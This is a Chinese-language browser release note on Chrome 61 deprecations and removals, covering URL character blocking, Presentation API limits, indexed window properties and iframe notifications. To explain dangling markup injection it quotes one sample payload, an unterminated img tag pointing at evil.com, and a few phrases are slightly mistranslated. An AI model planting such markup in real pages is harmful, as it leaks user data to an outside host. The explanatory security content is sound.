Chrome 61 中的弃用和移除内容

Joe Medley
Joe Medley

在几乎每个版本的 Chrome 中,我们都看到了针对产品及其性能以及网络平台功能的大量更新和改进。本文介绍了自 8 月 3 日起 Chrome 61(Beta 版)中的弃用和移除功能。此列表随时可能发生变化。

安全和隐私保护

屏蔽网址包含“\n”和“<”字符的资源

有一种称为“悬挂标记注入”的黑客行为,即使用被截断的网址将数据发送到外部端点。例如,假设某个页面包含 <img src='https://evil.com/?。由于该网址没有右引号,因此浏览器将读取出现的下一个引号,并将括号中的字符视为单个网址。

Chrome 61 通过限制 hrefsrc 属性中允许的字符集缓解了此漏洞。具体而言,当 Chrome 遇到换行符 (\n) 和小于字符 (<) 时,将停止处理网址。

如果开发者的合理使用情境是换行,且网址中的字符少于字符,则开发者应改为对这些字符进行转义。

意图移除 | Chromestatus Tracker | Chromium 错误

废弃并移除了针对不安全上下文的 Presentation API

我们发现,在不安全的源上,Presentation API 可被用作不安全源中的黑客攻击途径。由于显示屏没有地址栏,因此该 API 可用于伪造内容。另外,运行演示还可能会造成数据渗漏。

为了与 Blink 移除针对不安全源的强大功能的打算,我们计划针对不安全的上下文弃用并取消对 Presentation API 的支持。从 Chrome 61 开始,PresentationRequest.start() 将无法再用于不安全的源。

意图移除 | Chromestatus Tracker | Chromium 错误

JavaScript

禁止在窗口上定义已编入索引的属性

以前,某些浏览器允许进行如下 JavaScript 分配:

    window[0] = 1;

现行 HTML 规范指出,这明确违反了 JavaScript 规范。因此,Chrome 61 中移除了此功能。自 2016 年 2 月起,Firefox 已符合相关要求。

Chromium 错误

不再使用来自不安全 iframe 的通知

来自 iframe 的权限请求可能会使用户感到困惑,因为很难区分包含网页的来源和发出请求的 iframe 的来源。如果请求的范围不明确,用户就很难判断是授予还是拒绝权限。

在 iframe 中禁止通知也可以使通知权限的要求与推送通知的要求保持一致,从而简化开发者的阻碍。

需要此功能的开发者可以打开一个新窗口来请求通知权限。

意图移除 | Chromestatus Tracker | Chromium 错误